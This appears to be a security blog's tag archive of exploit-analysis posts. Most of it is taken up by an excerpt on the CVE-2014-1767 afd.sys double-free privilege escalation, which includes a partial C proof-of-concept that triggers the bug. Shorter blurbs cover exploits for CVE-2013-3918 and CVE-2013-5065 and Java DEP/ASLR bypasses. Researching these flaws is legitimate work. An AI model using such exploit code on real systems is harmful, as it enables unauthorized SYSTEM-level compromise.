Tag archive » Exploit

CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit

[0x00]. Introduction

First, there are several reasons I chose to analyze this vulnerability: (1) it is reported to have been ranked first for Best Privilege Escalation Bug at the 2014 Pwnie Awards, the "Oscars of hacking" (AFD.sys Dangling Pointer Vulnerability (CVE-2014-1767)); (2) it is a double-free bug, which is interesting; (3) so far only one writeup from abroad explaining the approach has been published, and no working exploit has been released, so there is something left to explore. Starting from the PoC, this article analyzes the root cause of the vulnerability on Windows 7 x86 and implements a privilege-escalation exploit that is as complete as possible :).

[0x01]. Vulnerability Analysis

A. First look

The most authoritative and most useful reference is the following PDF:
http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf

From the description in the PDF we derive the following PoC. All experiments in this article were done on 32-bit Windows 7 (6.1.7601).

=================================================
#include <windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib, "WS2_32.lib")

int main()
{
    DWORD targetSize     = 0x310;               // pool chunk size being targeted
    DWORD virtualAddress = 0x13371337;          // user-mode address handed to the driver
    // MDL length derived from the target size and the page offset of virtualAddress
    DWORD mdlSize = (0x4000 * (targetSize - 0x30) / 8) - 0xFFF - (virtualAddress & 0xFFF);

    // input buffer for the first IOCTL
    static DWORD inbuf1[100];
    memset(inbuf1, 0, sizeof(inbuf1));
    inbuf1[6]  = virtualAddress;
    inbuf1[7]  = mdlSize;
    inbuf1[10] = 1;

    // input buffer for the second IOCTL
    static DWORD inbuf2[100];
    memset(inbuf2, 0, sizeof(inbuf2));
    inbuf2[0] = 1;
    inbuf2[1] = 0x0AAAAAAA;

    WSADATA      WSAData;
    SOCKET       s;
    sockaddr_in  sa;
    int          ierr;
    .....

CVE-2013-3918 exploit analysis

Last month, FireEye caught a 0-day attack to which Microsoft assigned CVE-2013-3918. This 0-day may have been in the wild for more than a year. The sample can be found here: http://jsunpack.jeek.org/?report=0fe86b1a6fc27dbd4134d96e68b9153682cc6831. Metasploit has also released a module that works on Windows XP + IE8. In this post I give an in-depth analysis of the vulnerability.

NDProxy Local SYSTEM exploit(CVE-2013-5065)

Recently I posted the blog entry The Shellcode Used in the latest Zero Day Attack Analysis (CVE-2013-5065&CVE-2013-3346), which includes the CVE-2013-5065 exploit code; if you read it carefully, you can find the details there. I have now translated the assembly code into C. If it executes successfully, it pops a calc.exe with SYSTEM privileges. Have fun!

New Native Java Exploit Method Using Statement Object Analysis

At Black Hat 2013, ZDI published a paper, US-13-Gorenc-Java-Every-Days-Exploiting-Software-Running-on-3-Billion-Devices. In this white paper they describe a new way to exploit native Java vulnerabilities: by using the Statement object, DEP and ASLR can easily be bypassed. But how is it done? Recently, Packet Storm Security published two new native Java vulnerability exploits that use the Statement class, and the details can be found in them. I will explain those details for you!